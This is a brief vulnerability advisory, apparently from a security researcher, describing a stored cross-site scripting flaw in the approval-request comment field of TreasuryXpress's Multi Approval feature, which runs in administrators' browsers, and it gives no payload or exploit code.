TreasuryXpress is a SaaS (Software as a Service) company that offers treasury management and cash forecasting solutions.
The affected component exists within the Multi Approval security feature of the application. This feature is used to restrict lower privilege users from applying changes to sensitive modules, requiring the manual approval of one or more administrators prior to becoming active.
Whilst submitting an approval request, a comment can be added within the request which is vulnerable to XSS. Delivering a payload using this method would result in execution by the application’s administrator. This allows a targetted attack to take place, which escalates the risk of this vulnerability significantly.
As TreasuryXpress is primarily a SaaS solution, the TreasuryXpress website mentions their on-premise offering as a deployment option. If the affected TreasuryXpress version was found to be deployed on-premise, the vulnerability could be exploited in the same way.